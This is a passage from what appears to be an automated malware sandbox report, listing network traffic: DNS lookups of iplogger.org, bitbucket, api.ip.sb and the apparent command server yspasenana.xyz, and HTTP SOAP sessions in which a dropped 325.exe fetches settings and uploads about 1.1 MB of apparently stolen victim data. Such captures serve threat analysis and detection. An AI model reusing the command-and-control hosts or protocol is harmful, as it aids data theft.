Jul 22, 2021 11:44:12.859055042 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.859656096 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.859673977 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.860209942 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.860532045 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.860764980 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.861098051 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.861335039 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.861607075 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.862104893 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.862288952 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.862656116 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.863092899 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.863166094 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.863631010 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.864053011 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.864115953 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.864685059 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.865122080 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.865528107 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.865636110 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.866003990 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.866328955 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.866559982 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.866957903 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.867444038 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.867803097 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.868046999 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.868283033 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.868607044 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.868928909 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.869290113 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.869613886 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.870095015 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.870513916 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.870805979 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.871058941 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872153997 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872179985 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872204065 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872225046 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872296095 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872620106 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.872865915 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.873341084 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.873364925 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.873738050 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.873941898 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.874239922 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.874377012 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.874700069 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.875019073 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.875354052 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.875751019 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.875772953 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.876094103 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.876550913 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.876820087 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.876842022 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.877291918 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.877670050 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.877953053 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.878750086 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.879064083 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:13.002619982 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:13.056925058 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:13.214579105 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:13.214859962 CEST	49741	80	192.168.2.3	212.224.105.105

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 22, 2021 11:42:50.436938047 CEST	60152	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:50.497740984 CEST	53	60152	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:51.506886005 CEST	57544	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:51.556329966 CEST	53	57544	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:53.869375944 CEST	55984	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:53.933244944 CEST	53	55984	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:55.227030993 CEST	64185	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:55.279035091 CEST	53	64185	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:56.549263000 CEST	65110	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:56.598376989 CEST	53	65110	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:58.664081097 CEST	58361	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:58.675287962 CEST	63492	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:58.717329979 CEST	53	58361	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:58.733603001 CEST	53	63492	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:59.322242022 CEST	60831	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:59.391592026 CEST	53	60831	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:59.694236040 CEST	60100	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:59.755548954 CEST	53	60100	8.8.8.8	192.168.2.3
Jul 22, 2021 11:42:59.934425116 CEST	53195	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:42:59.983728886 CEST	53	53195	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:00.422305107 CEST	50141	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:00.481355906 CEST	53	50141	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:06.890603065 CEST	53023	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:06.942991972 CEST	53	53023	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:08.491096973 CEST	49563	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:08.543608904 CEST	53	49563	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:15.305854082 CEST	51352	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:15.357764006 CEST	53	51352	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:16.421140909 CEST	59349	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:16.480875969 CEST	53	59349	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:17.391518116 CEST	57084	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:17.443506002 CEST	53	57084	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:18.342683077 CEST	58823	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:18.402529001 CEST	53	58823	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:19.320419073 CEST	57568	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:19.380341053 CEST	53	57568	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:22.690311909 CEST	50540	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:22.748423100 CEST	53	50540	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:27.981369019 CEST	54366	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:28.054693937 CEST	53	54366	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:28.617409945 CEST	53034	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:28.674328089 CEST	53	53034	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:29.461571932 CEST	57762	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:29.515253067 CEST	53	57762	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:39.283081055 CEST	55435	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:39.342900991 CEST	53	55435	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:50.319731951 CEST	50713	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:50.370299101 CEST	53	50713	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:51.512294054 CEST	56132	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:51.565135956 CEST	53	56132	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:57.058478117 CEST	58987	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:57.131546974 CEST	53	58987	8.8.8.8	192.168.2.3
Jul 22, 2021 11:43:59.928487062 CEST	56579	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:43:59.988356113 CEST	53	56579	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:04.846780062 CEST	60633	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:04.907150984 CEST	53	60633	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:06.823750973 CEST	61292	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:06.884871960 CEST	53	61292	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:06.892400026 CEST	63619	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:06.953299999 CEST	53	63619	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:11.579966068 CEST	64938	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:11.641484976 CEST	53	64938	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:12.352585077 CEST	61946	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:12.412575006 CEST	53	61946	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:31.821844101 CEST	64910	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:31.893857956 CEST	53	64910	8.8.8.8	192.168.2.3
Jul 22, 2021 11:44:33.378647089 CEST	52123	53	192.168.2.3	8.8.8.8
Jul 22, 2021 11:44:33.436006069 CEST	53	52123	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jul 22, 2021 11:42:58.675287962 CEST	192.168.2.3	8.8.8.8	0x574a	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.322242022 CEST	192.168.2.3	8.8.8.8	0x554	Standard query (0)	is.gd	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.694236040 CEST	192.168.2.3	8.8.8.8	0x65e1	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)
Jul 22, 2021 11:43:00.422305107 CEST	192.168.2.3	8.8.8.8	0xd23c	Standard query (0)	bbuseruploads.s3.amazonaws.com	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:04.846780062 CEST	192.168.2.3	8.8.8.8	0xda5e	Standard query (0)	yspasenana.xyz	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:06.823750973 CEST	192.168.2.3	8.8.8.8	0xd22d	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:06.892400026 CEST	192.168.2.3	8.8.8.8	0x9e5c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:11.579966068 CEST	192.168.2.3	8.8.8.8	0x4d94	Standard query (0)	yspasenana.xyz	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:12.352585077 CEST	192.168.2.3	8.8.8.8	0xa170	Standard query (0)	yspasenana.xyz	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 22, 2021 11:42:58.733603001 CEST	8.8.8.8	192.168.2.3	0x574a	No error (0)	iplogger.org		88.99.66.31	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST	8.8.8.8	192.168.2.3	0x554	No error (0)	is.gd		104.25.234.53	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST	8.8.8.8	192.168.2.3	0x554	No error (0)	is.gd		172.67.83.132	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.391592026 CEST	8.8.8.8	192.168.2.3	0x554	No error (0)	is.gd		104.25.233.53	A (IP address)	IN (0x0001)
Jul 22, 2021 11:42:59.755548954 CEST	8.8.8.8	192.168.2.3	0x65e1	No error (0)	bitbucket.org		104.192.141.1	A (IP address)	IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST	8.8.8.8	192.168.2.3	0xd23c	No error (0)	bbuseruploads.s3.amazonaws.com	s3-1-w.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST	8.8.8.8	192.168.2.3	0xd23c	No error (0)	s3-1-w.amazonaws.com	s3-w.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 11:43:00.481355906 CEST	8.8.8.8	192.168.2.3	0xd23c	No error (0)	s3-w.us-east-1.amazonaws.com		52.217.201.169	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:04.907150984 CEST	8.8.8.8	192.168.2.3	0xda5e	No error (0)	yspasenana.xyz		212.224.105.105	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:06.884871960 CEST	8.8.8.8	192.168.2.3	0xd22d	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 11:44:06.953299999 CEST	8.8.8.8	192.168.2.3	0x9e5c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Jul 22, 2021 11:44:11.641484976 CEST	8.8.8.8	192.168.2.3	0x4d94	No error (0)	yspasenana.xyz		212.224.105.105	A (IP address)	IN (0x0001)
Jul 22, 2021 11:44:12.412575006 CEST	8.8.8.8	192.168.2.3	0xa170	No error (0)	yspasenana.xyz		212.224.105.105	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

yspasenana.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49739	212.224.105.105	80	C:\Users\user\AppData\Roaming\325.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 11:44:05.202037096 CEST	6920	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: yspasenana.xyz Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jul 22, 2021 11:44:05.249474049 CEST	6920	IN	HTTP/1.1 100 Continue
Jul 22, 2021 11:44:05.250051022 CEST	6920	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettings xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Jul 22, 2021 11:44:05.354886055 CEST	6922	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 22 Jul 2021 09:44:05 GMT Content-Type: text/xml; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=3 Vary: Accept-Encoding Content-Encoding: gzip Data Raw: 33 65 34 0d 0a 1f 8b 08 00 00 00 00 00 02 03 bd 58 6d 8f e2 36 10 fe 2b 11 d2 4a 2d ba 25 5c b7 dd 9e 10 87 c4 4b d8 a2 2e bb 94 70 7b ad 94 2f c6 19 88 8b e3 89 6c 67 03 ab fb f1 75 42 c2 42 ef b6 2a 31 ad 84 48 3c e3 79 32 1e 8f c7 8f dd 55 1d 4f 3c 03 c7 04 9c 6d cc 85 ea a8 8f 8d 48 eb a4 e3 ba 8a 46 10 13 d5 32 72 85 24 69 a1 5c bb f9 8b 0b a5 85 db e8 75 55 67 80 e1 ae d7 35 28 4c a2 88 41 68 1f b4 66 62 ad e6 a0 12 14 aa 04 3e c0 6a 88 93 54 b2 02 ae f1 96 61 ca 75 e9 0f f9 d8 18 48 cc 14 48 6f ab 41 28 86 a2 51 aa d8 01 33 cb b2 56 76 53 40 fe d0 6e bf 77 7f 9f de fb 85 f7 d7 4c 28 4d 04 05 f3 25 d2 19 70 a4 1b 08 87 98 0a 2d 77 25 ca f2 ab 01 c7 8c 4a 54 b8 d2 2d 8a 71 0e 78 e3 be 6f bb 3e 48 46 38 7b 21 da b8 e0 f6 a5 24 3b d5 70 8f 60 27 b3 8b 21 3e 2e ff 04 aa 7f ec 69 99 42 d7 7d 6d 1f 54 b7 bd 15 e1 ea 48 77 9b eb 7c 4a 44 19 2c 75 b0 3d 11 96 9d 86 91 c4 18 2a e9 8c e8 48 5d c2 f7 5e 77 d9 51 5a 9a 39 ec 5d 7d f2 bd f9 6c fe 38 9e dc 7b 57 41 3f 49 46 44 93 e0 1e 29 e1 c1 80 68 cd a1 25 40 77 dd 83 c1 bf 33 2d 1c 67 69 1c 7c 32 8e 3b b9 e2 6c 88 3b c4 35 87 3d 12 58 e3 7c b7 fd 70 fb bd 0d d8 1c 49 6c b4 c1 63 02 92 38 be 89 73 46 24 04 67 bb 33 25 09 07 5f a7 21 c3 d2 9d 19 4f 95 c5 f8 26 92 85 76 91 fe d9 d7 44 96 ff f5 51 86 a6 32 94 99 6a 83 12 41 88 da 02 e0 89 3d 13 1e 32 0b 84 5f cd 9c 98 46 7d 00 8f 43 5e 26 95 63 1f 0e 2f 61 d4 99 49 33 26 ba bb 00 5c 3a c4 97 29 84 cc 8c 4e 12 61 01 34 06 21 99 74 26 82 06 3e 07 96 08 26 7f 0a d4 7e 5f 08 62 0c 53 0e ea 50 04 9e 18 64 20 cf 4f 05 f3 ca 99 20 77 12 d3 24 18 32 63 81 36 99 85 98 a1 a8 1e f5 71 38 83 25 b1 71 e4 37 b3 01 f9 a9 5c 59 40 3c ca 25 d3 56 6b 7e 88 66 96 30 18 49 b2 b6 8a 46 3f 66 eb 7d 30 2c 40 16 28 69 64 61 ff 07 11 21 6c cb c7 05 6a d0 3e 36 f5 01 6e 6e db 95 17 f6 de 4c c9 56 47 28 6e 6c 2a da f5 d4 10 41 9b 69 f6 93 54 0b b6 39 3c eb 23 3d 30 6a bb a3 0f 91 9a df 05 42 6b 59 04 8b fa 66 97 29 53 c2 78 6b 9e 06 7d 8d 36 ab 79 20 c9 33 1c 38 49 d1 ba be 40 e6 55 8c 32 f0 c2 b5 cd 84 3d 3c 4d 46 93 be 33 44 99 a0 2c 98 68 25 ba 83 b1 59 fb e0 78 5b 43 ab 18 98 03 c0 f9 a9 a9 81 c4 e7 cf 9d dc 25 1a 17 64 f9 cf bb aa fb 26 0f af 28 fa 88 29 8a 32 7c e5 f9 c7 c2 b2 cf 78 31 3b a1 f9 79 bb 52 31 b3 53 9e 2a 0b c9 b1 fa 3f e1 fd a9 19 49 22 71 65 3e 70 15 8c 40 6d 34 26 5f 9a 2d bd d5 ef 9a ad 10 69 f3 5d 73 03 3b f3 9f 11 ce 41 9b 17 05 10 36 bf b4 bf 1d ea 53 38 a4 69 c1 80 ce 06 74 ff 3e ec 2a 10 77 40 37 f8 ff 1f 84 2a d6 3f c5 17 c6 39 09 c6 4c c2 0a b7 35 ce 0d 9f 89 06 59 cf b4 28 df 80 a2 86 e9 22 4a cd 9e 68 d8 82 0c 6b 58 97 1b e1 84 c2 9e 27 d4 80 f8 90 00 dd aa e2 b8 63 08 e1 6e 59 37 06 0f de e2 ae bf f0 9c 05 d0 48 20 c7 35 33 04 73 c0 09 dd fc 42 b2 1a 78 53 44 41 23 c6 43 c3 ae 0d 5d a5 79 56 a8 60 46 38 38 b9 ea 1b 39 f9 75 06 56 b9 e9 53 09 20 4e 16 71 29 aa 3a e4 25 ea b4 42 ec 45 a5 7e 61 a6 77 2d 4d fb 18 e2 20 2c 3b 3d cd 1e 4e 21 72 41 a9 fb 5c 2c a9 d3 3a 52 c9 ba ee 9b 57 37 6f ea 8a fb 20 a3 ad 6e 8d dc d7 eb a7 de 5f e7 f1 c2 3e 8b 12 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3e4Xm6+J-%\K.p{/lguBB1H<y2UO<mHF2r$i\uUg5(LAhfb>jTauHHoA(Q3VvS@nwL(M%p-w%JT-qxo>HF8{!$;p`'!>.iB}mTHw\|JD,u=H]^wQZ9]}l8{WA?IFD)h%@w3-gi\|2;l;5=X\|pIlc8sF$g3%_!O&vDQ2jA=2_F}C^&c/aI3&\:)Na4!t&>&~_bSPd O w$2c6q8%q7\Y@<%Vk~f0IF?f}0,@(ida!lj>6nnLVG(nlAiT9<#=0jBkYf)Sxk}6y 38I@U2=<MF3D,h%Yx[C%d&()2\|x1;yR1S?I"qe>p@m4&_-i]s;A6S8it>w@7?9L5Y("JhkX'cnY7H 53sBxSDA#C]yV`F889uVS Nq):%BE~aw-M ,;=N!rA\,:RW7o n_>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49741	212.224.105.105	80	C:\Users\user\AppData\Roaming\325.exe

Timestamp	kBytes transferred	Direction	Data
Jul 22, 2021 11:44:11.703536034 CEST	6928	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: yspasenana.xyz Content-Length: 1125491 Expect: 100-continue Accept-Encoding: gzip, deflate
Jul 22, 2021 11:44:11.753475904 CEST	6928	IN	HTTP/1.1 100 Continue
Jul 22, 2021 11:44:11.755002975 CEST	6941	OUT	Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironment xmlns="http://tempuri.org/"><user xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:City>UNKNOWN</a:City><a:Country>CH</a:C
Jul 22, 2021 11:44:11.802614927 CEST	6947	OUT	Data Raw: 72 45 6e 67 65 54 75 48 6a 71 6c 79 64 41 6c 41 78 73 63 54 4d 6a 62 4c 78 47 64 49 74 6b 6c 51 62 49 50 53 49 56 4a 35 35 48 61 45 54 4f 76 7a 69 50 6a 52 45 77 69 2b 4c 6b 4b 68 35 4a 38 38 61 39 45 66 75 57 57 67 6a 43 75 45 66 30 44 45 73 66 Data Ascii: rEngeTuHjqlydAlAxscTMjbLxGdItklQbIPSIVJ55HaETOvziPjREwi+LkKh5J88a9EfuWWgjCuEf0DEsfVzAlZs9VdVBHXSMtDRnkeLPl8Np8ulT+6n9woSgDkJyPtToDwOf1x1HXV87rfrfkJrDwvo/1mAAIyQ91sHWgCmoXEhDx5/uojHny5kvdD+GvT8Pi5wjgGgvERpOga36RqM/g871V5JUOwwA6CYqAYUcwWo+CzIJ/e
Jul 22, 2021 11:44:11.802659988 CEST	6952	OUT	Data Raw: 57 67 30 59 77 79 41 69 6a 78 38 7a 4b 35 44 35 77 7a 4c 30 66 4c 4c 63 43 4d 39 7a 2b 71 41 36 6a 57 68 6b 73 55 72 58 52 77 42 4f 43 72 6b 32 6e 43 46 38 50 41 37 57 44 6b 75 47 58 74 63 73 4e 39 41 35 64 54 44 78 61 77 43 75 2f 56 6f 42 50 33 Data Ascii: Wg0YwyAijx8zK5D5wzL0fLLcCM9z+qA6jWhksUrXRwBOCrk2nCF8PA7WDkuGXtcsN9A5dTDxawCu/VoBP3gCJ62AtABEEnCnv3ujE4D6e/52Ovj7DikACXoacM8TThlUAG751P8XST9JHERWEAhAFWygQIODbSkAiXYC33ffNzcC0H/0l5/+I/n3UctB5tTTv+Lly7MOv8BJmStvoKezbjV7fQsLwN/97mLzvd9cZR6zarWTM7M
Jul 22, 2021 11:44:11.802870035 CEST	6965	OUT	Data Raw: 55 72 44 67 6b 51 75 6a 43 46 53 6d 51 4c 63 33 67 39 49 53 4b 47 30 58 71 42 77 45 79 6a 73 75 55 76 4c 6c 30 47 33 4b 32 2b 4d 46 63 7a 64 79 2f 74 66 78 77 64 42 49 34 59 65 51 73 56 79 53 75 51 44 73 6a 5a 52 6c 61 4c 39 47 70 74 66 41 39 4e Data Ascii: UrDgkQujCFSmQLc3g9ISKG0XqBwEyjsuUvLl0G3K2+MFczdy/tfxwdBI4YeQsVySuQDsjZRlaL9GptfA9Ns8rx/bPt8RlAWOJbdBUNv1wF8nfT1ZAAoRSOKPgX2CUP0q6pvc/8E9MyjoY8MSMD6MBYjRc8gxDqLmezSGjoUaV7uAcxgA5YWgOo0Bmrc0KB/TlUaWMwQ6ntGgGGhQwNplFvDrC7FeWRLQOnA5oOsvz8kyifblMmt
Jul 22, 2021 11:44:11.843419075 CEST	6968	OUT	Data Raw: 56 74 6c 42 66 38 55 75 76 6c 35 4e 38 39 6c 4a 36 2f 38 49 4f 55 58 31 33 58 36 56 2f 65 73 6b 73 38 73 36 39 32 6a 4b 73 76 6b 58 36 4f 4f 62 68 43 31 76 67 63 51 65 53 5a 7a 56 42 35 6a 74 2f 2b 69 70 6a 61 42 36 70 62 30 47 66 32 54 54 37 37 Data Ascii: VtlBf8Uuvl5N89lJ6/8IOUX13X6V/esks8s692jKsvkX6OObhC1vgcQeSZzVB5jt/+ipjaB6pb0Gf2TT77CfzXuy2YX+JjHnRGQrACmfPI6TuMQzmzJ2obYa1c+VR1KRcPmoTrb9qA3X+fc2HXhPx6H2A+3kJ2J9jehYJPAIWUfeTk8Z/gVJN3Fu1OeIe1D9bXqSp3Q+T9k/bhvqA/rc0PF0X9HtSWJNHtPl4XLp3O0+e268mOx
Jul 22, 2021 11:44:11.850198030 CEST	6971	OUT	Data Raw: 49 4e 73 66 38 46 74 36 6e 4e 64 73 54 39 39 39 53 4e 4b 4f 68 44 37 39 49 49 67 58 79 37 5a 73 45 6e 78 55 44 33 6f 36 56 33 30 45 4f 4e 6e 6e 62 62 71 46 2b 32 35 71 2b 46 65 73 6d 31 2b 79 74 6e 32 49 6f 66 75 49 66 69 57 59 76 69 63 43 42 41 Data Ascii: INsf8Ft6nNdsT999SNKOhD79IIgXy7ZsEnxUD3o6V30EONnnbbqF+25q+Fesm1+ytn2IofuIfiWYvicCBAQjUFCSRgdAcwGYR0qqPqAyJVF7qPbUROlBmQSqC0QLCSA1soBjl6DrgdKE2L4G0O2RA7Vn1L9TwDotX3y7o2sq0P1DAxerFSCpVwMqMwAsmgPoHHvg5yz6W4DaKEck/9Y2AegFWQIl1JD0k+j0k2e6AlDuS+3PIgU
